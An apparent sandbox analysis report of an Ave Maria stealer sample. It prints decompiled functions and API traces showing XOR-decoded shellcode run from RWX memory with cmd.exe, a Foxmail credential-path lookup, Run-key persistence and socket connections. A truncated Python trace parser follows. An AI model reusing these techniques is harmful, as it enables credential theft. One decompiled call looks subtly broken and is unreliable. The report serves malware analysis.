                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,0043F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043EFA7
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: D}D$D}D$MachineGuid$SOFTWARE\Microsoft\Cryptography
                                      • API String ID: 1903904756-2861317292
                                      • Opcode ID: bcf930d156b3afa4211f9002da33c01f5b155b8b30ab5d71786524c6baa64898
                                      • Instruction ID: 9de9f946743afac7dfa8560b4950666b9f72cfd2a31f4cc3f8d014c0133e3479
                                      • Opcode Fuzzy Hash: bcf930d156b3afa4211f9002da33c01f5b155b8b30ab5d71786524c6baa64898
                                      • Instruction Fuzzy Hash: 76117270E10115ABCB04FB95D9538EDB778AF58704F50216FB401A3191DBB81F06DB98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 74%
                                      			E0043EAC8(void* __ecx, void* __eflags) {
                                      				void* _v8;
                                      				char _v12;
                                      				char _v16;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				void* _t15;
                                      				intOrPtr* _t16;
                                      				intOrPtr _t34;
                                      				void* _t45;
                                      
                                      				_t45 = __eflags;
                                      				_t15 = E0043E8EC();
                                      				_push(__ecx);
                                      				_t16 = E0043E907(_t15, "VirtualQuery", _t45);
                                      				if(_t16 != 0) {
                                      					_t16 =  *_t16(E0043EAC8,  &_v44, 0x1c);
                                      					_t34 = _v40;
                                      					_t47 = _t34;
                                      					if(_t34 != 0) {
                                      						E0043E762(_t34, _t47);
                                      						MessageBoxA(0, "Bla2", "Bla2", 0);
                                      						_push(_t34);
                                      						_v12 = 0;
                                      						E0043EB77( &_v16, _t47, E00433412( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
                                      						E00435A2D(_v8);
                                      						_v8 = 0;
                                      						E00435A2D(0);
                                      						_push(0);
                                      						_v12 = 0;
                                      						E0043EB77( &_v16, _t47, E00433412( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
                                      						E00435A2D(_v8);
                                      						_v8 = 0;
                                      						return E00435A2D(0);
                                      					}
                                      				}
                                      				return _t16;
                                      			}

                                      APIs
                                        • Part of subcall function 0043E907: lstrcmpA.KERNEL32(?,0043F9CB,?,open,0043F9CB), ref: 0043E940
                                      • MessageBoxA.USER32(00000000,Bla2,Bla2,00000000), ref: 0043EB0E
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043EB77: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0043EBB2
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 0043EB4C
                                      • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0043EB1C
                                      • VirtualQuery, xrefs: 0043EAD5
                                      • Bla2, xrefs: 0043EB05, 0043EB0B, 0043EB0C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                      • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                      • API String ID: 1196126833-2308542105
                                      • Opcode ID: 72123dd4687308d070e2e7bf4641e7f4e15c66a12bba7ca4e9e39af705c911ee
                                      • Instruction ID: b1daaa142c3d637e31fe05b685505fbf190ea1d8cae03a4a187c38a913556e23
                                      • Opcode Fuzzy Hash: 72123dd4687308d070e2e7bf4641e7f4e15c66a12bba7ca4e9e39af705c911ee
                                      • Instruction Fuzzy Hash: D11154B0A01514BA9B09FBA2DD52DEFBB78DF48714F10515FF402A2582DB785F01D668
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 73%
                                      			E0043F73D(void* __ecx) {
                                      				long _v8;
                                      				void* _t7;
                                      				void* _t17;
                                      				void* _t24;
                                      				void* _t26;
                                      				WCHAR* _t31;
                                      
                                      				_push(__ecx);
                                      				_t17 = __ecx;
                                      				_t26 = E004310AD(0x800);
                                      				_t24 = _t26;
                                      				_t7 = 0x601;
                                      				do {
                                      					 *_t24 =  *(0x443c00 + _t24) ^ 0x00000045;
                                      					_t24 = _t24 + 1;
                                      					_t7 = _t7 - 1;
                                      				} while (_t7 != 0);
                                      				VirtualProtect(_t26, 0x7d0, 0x40,  &_v8);
                                      				_t31 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
                                      				GetWindowsDirectoryW(_t31, 0x104);
                                      				E0043102C( &(_t31[lstrlenW(_t31)]), L"\\System32\\cmd.exe", 0x28);
                                      				_t5 = _t26 + 0xef; // 0xef
                                      				return  *_t5(_t31, _t17, 0, 0);
                                      			}

                                      APIs
                                        • Part of subcall function 004310AD: GetProcessHeap.KERNEL32(00000000,00000000,0043F750,00000800,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 004310B3
                                        • Part of subcall function 004310AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 004310BA
                                      • VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 0043F77B
                                      • VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F78F
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?), ref: 0043F79D
                                      • lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F7AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocHeapVirtual$DirectoryProcessProtectWindowslstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 34486464-2003734499
                                      • Opcode ID: 6f8c10615cea8372353da799e800fe0d5277d7049a1a4f1e3c701de6aad0ba7c
                                      • Instruction ID: fcf847484ee5e2128083330ad0e2d950715bfcee335a2577b96b47eed4ce21ca
                                      • Opcode Fuzzy Hash: 6f8c10615cea8372353da799e800fe0d5277d7049a1a4f1e3c701de6aad0ba7c
                                      • Instruction Fuzzy Hash: 330147717403517BF22057759D0AFAB3BACDBCAB11F500025F704EA1C0CAE9A801839C
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 87%
                                      			E0043FC79(CHAR* __ecx, long* __edx) {
                                      				/* Reads the whole file named by __ecx into a heap buffer and returns
                                      				   the buffer; the file size is written through __edx. The only string
                                      				   xref at this site (0043FC80) resolves to C:\ProgramData\images.exe.
                                      				   E004310AD wraps GetProcessHeap/HeapAlloc (see the APIs list below). */
                                      				long _v8;
                                      				long _t6;
                                      				void* _t11;
                                      				long* _t18;
                                      				void* _t22;
                                      
                                      				_push(__ecx);
                                      				_t18 = __edx;
                                      				_t11 = E004310AD("C:\ProgramData\images.exe");   /* heap buffer; as rendered it is allocated before the file size is known */
                                      				_v8 = 0;
                                      				/* GENERIC_READ (0x80000000), no sharing, OPEN_EXISTING (3), FILE_ATTRIBUTE_NORMAL (0x80) */
                                      				_t22 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0);
                                      				_t6 = GetFileSize(_t22, 0);
                                      				 *_t18 = _t6;
                                      				ReadFile(_t22, _t11, _t6,  &_v8, 0);   /* bytes actually read land in _v8 and are not checked */
                                      				CloseHandle(_t22);
                                      				return _t11;
                                      			}

                                      APIs
                                        • Part of subcall function 004310AD: GetProcessHeap.KERNEL32(00000000,00000000,0043F750,00000800,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 004310B3
                                        • Part of subcall function 004310AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 004310BA
                                      • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0043FCA6
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00432B6F), ref: 0043FCB1
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0043FCC2
                                      • CloseHandle.KERNEL32(00000000), ref: 0043FCC9
                                      Strings
                                      • C:\ProgramData\images.exe, xrefs: 0043FC80
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Heap$AllocCloseCreateHandleProcessReadSize
                                      • String ID: C:\ProgramData\images.exe
                                      • API String ID: 1280141731-922034686
                                      • Opcode ID: 2e013649406f67e3ad7c3c546687d2b1ec1736450b78cd5571415516e6ae9d95
                                      • Instruction ID: 821c81e0de00d1dc503ea2556b79e8d2d8b2eba6ba1262382b6cb05c66f4dc07
                                      • Opcode Fuzzy Hash: 2e013649406f67e3ad7c3c546687d2b1ec1736450b78cd5571415516e6ae9d95
                                      • Instruction Fuzzy Hash: 4CF082B6611210BFF3245B65AD09FBB36ECEB4A714F500076FA01E3180EAF45E0187B8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CC52C3,?,?,00CC528B,?,00000000), ref: 00CC5332
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00CC52C3,?,?,00CC528B,?,00000000), ref: 00CC5345
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00CC52C3,?,?,00CC528B,?,00000000), ref: 00CC5368
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 4ca0ed14984a63e0859da84a8760ea8dc2d87763cbc729b81a6c879608b00665
                                      • Instruction ID: bd7af0378adee51cffc45651800f1b6b0991203346bc2986ce5d72187e469e36
                                      • Opcode Fuzzy Hash: 4ca0ed14984a63e0859da84a8760ea8dc2d87763cbc729b81a6c879608b00665
                                      • Instruction Fuzzy Hash: B2F0C831A0024CBBDB159F61DC49FAEBFB8EF04751F4401A8F905A61A0CF709F80DA80
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E00438A40(void* __ecx) {
                                      				/* Locates the Foxmail installation: the "Executable" value under
                                      				   HKCU\software\Aerofox\FoxmailPreview is read into the global buffer at
                                      				   0x4467a0 (MAX_PATH, 0x104 bytes) and PathRemoveFileSpecA strips the
                                      				   file name, leaving the install directory there. Returns 1 on success,
                                      				   0 otherwise. The key handle in _v12 is never closed. */
                                      				int _v8;
                                      				void* _v12;
                                      				void* _t7;
                                      
                                      				/* 0x80000001 = HKEY_CURRENT_USER, 0x20019 = KEY_READ */
                                      				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
                                      					L3:
                                      					_t7 = 0;
                                      				} else {
                                      					_v8 = 0x104;
                                      					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x4467a0,  &_v8) != 0) {
                                      						goto L3;
                                      					} else {
                                      						PathRemoveFileSpecA(0x4467a0);
                                      						_t7 = 1;
                                      					}
                                      				}
                                      				return _t7;
                                      			}

                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 00438A5B
                                      • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,004467A0,?), ref: 00438A82
                                      • PathRemoveFileSpecA.SHLWAPI(004467A0), ref: 00438A8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileOpenPathQueryRemoveSpecValue
                                      • String ID: Executable$software\Aerofox\FoxmailPreview
                                      • API String ID: 3687894118-2371247776
                                      • Opcode ID: 8c510178d640b74989c181940c7151f7b94a54d62532ec0dd0af4eb7242cc4a4
                                      • Instruction ID: 1186caf8de6d69a179c544835f409e5ff495f8f9e0d18039a8cad436d0865d28
                                      • Opcode Fuzzy Hash: 8c510178d640b74989c181940c7151f7b94a54d62532ec0dd0af4eb7242cc4a4
                                      • Instruction Fuzzy Hash: 47F03778644308BAEB209FA0DD46FABBBBC9746F05F50416ABA05F1181D6F49A01D92D
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: c6345725517d69df9e5ebd187d710527e6c8a6fa596804ea4aa6da59d8af1f01
                                      • Instruction ID: 44afa6afc0597ce160cf2a8765a7b577cd5b932b314ba772859c89281e4434a2
                                      • Opcode Fuzzy Hash: c6345725517d69df9e5ebd187d710527e6c8a6fa596804ea4aa6da59d8af1f01
                                      • Instruction Fuzzy Hash: 8B41B076A006009FCB24DF68C881F6AB3A5EF89714F5545ACE529EB351D731BE41DB80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 00CC9320
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CC9343
                                        • Part of subcall function 00CC6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,00CC852B,00001000,?,?,?,?,00CC3843), ref: 00CC6F11
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CC9369
                                      • _free.LIBCMT ref: 00CC937C
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CC938B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                      • String ID:
                                      • API String ID: 2278895681-0
                                      • Opcode ID: c1410d1d38ade23dde5940140c644022790d408288daa1ba8f6a014fd85dc7bc
                                      • Instruction ID: e84332f2f3f4915d06bee320457aab676c34422b6d2a4a3f61aaa16dc5a1e1fd
                                      • Opcode Fuzzy Hash: c1410d1d38ade23dde5940140c644022790d408288daa1ba8f6a014fd85dc7bc
                                      • Instruction Fuzzy Hash: CC01F7726012957F232116B7DD8DF7F7A6DDEC6BA5319022EF918C61A0EF708D0191B0
                                      Uniqueness

                                      Uniqueness Score: 0.55%

                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00CC621F,00CC47EE), ref: 00CC7906
                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,?,?,00CC621F,00CC47EE), ref: 00CC792C
                                      • _free.LIBCMT ref: 00CC796C
                                      • _free.LIBCMT ref: 00CC799F
                                      • SetLastError.KERNEL32(00000000,?,00CC621F,00CC47EE), ref: 00CC79AC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: b8002f54b330bf598c86ca86e940309471ec02eebe733b4b6405ac19c9f5eddb
                                      • Instruction ID: 06b0af7541eafe4fd125be97048cb38eeb0739289435e9ee1413edbc4512bbb6
                                      • Opcode Fuzzy Hash: b8002f54b330bf598c86ca86e940309471ec02eebe733b4b6405ac19c9f5eddb
                                      • Instruction Fuzzy Hash: 891100321086006AD6023739ED95F3F225EDF89734B36072CF539A62E1EF30CE026A20
                                      Uniqueness

                                      Uniqueness Score: 0.32%

                                      APIs
                                      • GetLastError.KERNEL32(?,?,00CC379D,?,?,?,00CC385A,00000000), ref: 00CC77B7
                                      • _free.LIBCMT ref: 00CC780E
                                      • _free.LIBCMT ref: 00CC7842
                                      • SetLastError.KERNEL32(00000000,00000000), ref: 00CC784F
                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,?,00CC385A,00000000), ref: 00CC785B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: f5c0c1da690943efaf0ee487661e16be27877a425fe7cb666c643f6bcfaa7c67
                                      • Instruction ID: 889e583b4d70d6c95f7261f3727787f727f385e6691f15570da620da4370a768
                                      • Opcode Fuzzy Hash: f5c0c1da690943efaf0ee487661e16be27877a425fe7cb666c643f6bcfaa7c67
                                      • Instruction Fuzzy Hash: 5411C4315086406AE6123734ED9AF3F2619EF95731F31032CFA35A65E5FF248E42AB21
                                      Uniqueness

                                      Uniqueness Score: 0.32%

                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 0043D361
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0043D372
                                      • gethostbyname.WS2_32(?), ref: 0043D380
                                      • htons.WS2_32(?), ref: 0043D3A6
                                      • connect.WS2_32(00000000,?,00000010), ref: 0043D3B9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupconnectgethostbynamehtonssocket
                                      • String ID:
                                      • API String ID: 2405761414-0
                                      • Opcode ID: 3eb7c27063360c3ae1bfb45e76e9b027dc0ef801ef8a35c101d8ed5c5461a5db
                                      • Instruction ID: 00f42c6ece0269ce34471c2f573ca3758fc48681b69e043a47737d3ab29ccbd5
                                      • Opcode Fuzzy Hash: 3eb7c27063360c3ae1bfb45e76e9b027dc0ef801ef8a35c101d8ed5c5461a5db
                                      • Instruction Fuzzy Hash: F501F5B56003046BE2109F74AC4DE7BB7BCEF49B21F00193AFD54D71A1E6A4CD1883AA
                                      Uniqueness

                                      Uniqueness Score: 10.55%
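The API lists above share one line format ("api.MODULE(arg,arg,...), ref: ADDR"), and four of them carry the behaviours an analyst would write up: the RWX VirtualProtect/VirtualAlloc pair next to the \System32\cmd.exe string at 0x43F77B-0x43F7AB, the file reader E0043FC79, the Foxmail registry lookup E00438A40, and the WSAStartup/socket/gethostbyname/connect sequence at 0x43D361-0x43D3B9. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it parses lines in that format, turns the raw hex arguments back into the Win32 constants they encode, tags each call site, and combines the tags into findings. The trace it runs on is constructed by copying lines from this report; the tag names and the combination rules are this example's own choices, not a Joe Sandbox feature.

```python
import re
from dataclasses import dataclass

# Win32 constants that the report prints as raw hex (documented header values).
PAGE_EXECUTE_READWRITE = 0x40
HKEY_CURRENT_USER = 0x80000001
AF_INET, SOCK_STREAM = 2, 1

# Constructed input: API lines copied from the "APIs" lists of this report.
SAMPLE_TRACE = r"""
VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 0043F77B
VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F78F
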